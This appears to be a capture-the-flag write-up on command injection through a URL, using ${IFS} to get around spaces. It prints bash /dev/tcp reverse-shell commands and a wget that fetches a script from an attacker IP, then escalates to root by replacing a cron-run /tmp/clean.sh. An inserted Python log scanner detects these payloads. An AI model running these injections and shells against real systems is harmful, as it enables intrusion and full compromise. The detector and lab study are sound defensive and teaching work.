hint: need pspy for privilege escalation
Getting access. Be thorough when checking the Burp Suite output so you don't miss a small detail (e.g. that your command actually worked).
`ls` worked, but any spaces broke the injection.
How to inject a command with spaces in a URL? IFS:
`ls${IFS}-la`
Reverse shell (IFS'ed):
`/bin/bash${IFS}-l${IFS}>${IFS}/dev/tcp/10.6.62.12/7777${IFS}0<&1${IFS}2>&1`
Doesn't work. Upload a file, then run it?
Make a reverse shell .sh in transfer:
`/bin/bash -l > /dev/tcp/10.6.62.12/7777 0<&1 2>&1`
wget command IFS'd:
`wget${IFS}http://10.6.62.12/rev.sh`
Give it perms, command IFS'd:
`chmod${IFS}+x${IFS}rev.sh`
It doesn't like the plus sign. 777 also sets the execute bit, so we can:
`chmod${IFS}777${IFS}rev.sh`
Now run it:
`./rev.sh`
Doesn't like the dot. Run it using bash:
`bash${IFS}rev.sh`
Do the enum. Nothing.
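From the defender's side, the `${IFS}` trick above leaves a very recognisable trail in the web server's access log. The scanner below is an added example, not code from the original notes; the log format, IP addresses and `/ping?ip=` parameter are constructed placeholders, and it decodes each query value twice so double URL-encoding cannot hide the pattern.

```python
import re
from urllib.parse import unquote, urlsplit

# Constructed combined-format access-log lines (IPs and paths are placeholders,
# not from the original notes). Line 1 is benign; lines 2-5 mirror the ${IFS}
# injection attempts the write-up describes, with line 5 double URL-encoded.
SAMPLE_LOG = [
    '10.0.0.5 - - [01/Jan/2024:12:00:00 +0000] "GET /ping?ip=127.0.0.1 HTTP/1.1" 200 45',
    '10.0.0.5 - - [01/Jan/2024:12:00:05 +0000] "GET /ping?ip=127.0.0.1;ls%24%7BIFS%7D-la HTTP/1.1" 200 612',
    '10.0.0.5 - - [01/Jan/2024:12:00:09 +0000] "GET /ping?ip=127.0.0.1;/bin/bash%24%7BIFS%7D-l%24%7BIFS%7D%3E%24%7BIFS%7D/dev/tcp/10.0.0.5/7777 HTTP/1.1" 500 0',
    '10.0.0.5 - - [01/Jan/2024:12:00:12 +0000] "GET /ping?ip=127.0.0.1;wget%24%7BIFS%7Dhttp://10.0.0.5/rev.sh HTTP/1.1" 200 12',
    '10.0.0.5 - - [01/Jan/2024:12:00:15 +0000] "GET /ping?ip=127.0.0.1;bash%2524%257BIFS%257Drev.sh HTTP/1.1" 200 0',
]

REQUEST_RE = re.compile(r'"[A-Z]+ (?P<target>\S+) HTTP/')
INDICATORS = {
    "ifs-whitespace": re.compile(r'\$\{?IFS\}?'),  # ${IFS} or $IFS standing in for a space
    "shell-separator": re.compile(r'[;|`]|\$\('),  # a second command riding on the value
    "dev-tcp": re.compile(r'/dev/tcp/'),           # bash's TCP pseudo-device
}
STRONG = {"ifs-whitespace", "dev-tcp"}  # never legitimate in a query value; separator alone is only context

def decoded_values(target):
    """Query values of a request target, URL-decoded twice so %2524-style
    double encoding cannot hide ${IFS}."""
    query = urlsplit(target).query
    return [unquote(unquote(pair.partition("=")[2])) for pair in query.split("&") if pair]

def classify(value):
    """Names of the indicators present in one decoded parameter value."""
    return {name for name, pattern in INDICATORS.items() if pattern.search(value)}

def scan_log(lines):
    """Return (line_no, target, sorted reasons) for requests that look like IFS injection."""
    hits = []
    for line_no, line in enumerate(lines, 1):
        match = REQUEST_RE.search(line)
        if not match:
            continue
        target = match.group("target")
        reasons = set().union(*(classify(v) for v in decoded_values(target)))
        if reasons & STRONG:
            hits.append((line_no, target, sorted(reasons)))
    return hits

if __name__ == "__main__":
    for line_no, target, reasons in scan_log(SAMPLE_LOG):
        print(f"line {line_no}: {', '.join(reasons)}  {target}")
```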
LinPEAS highlighted some files that keep running, but nothing 100% obvious.
pspy gave us a few processes that keep happening, and we saw clean.sh in /tmp.
Make a clean.sh file that gives us a reverse shell and replace the one in /tmp.
root!
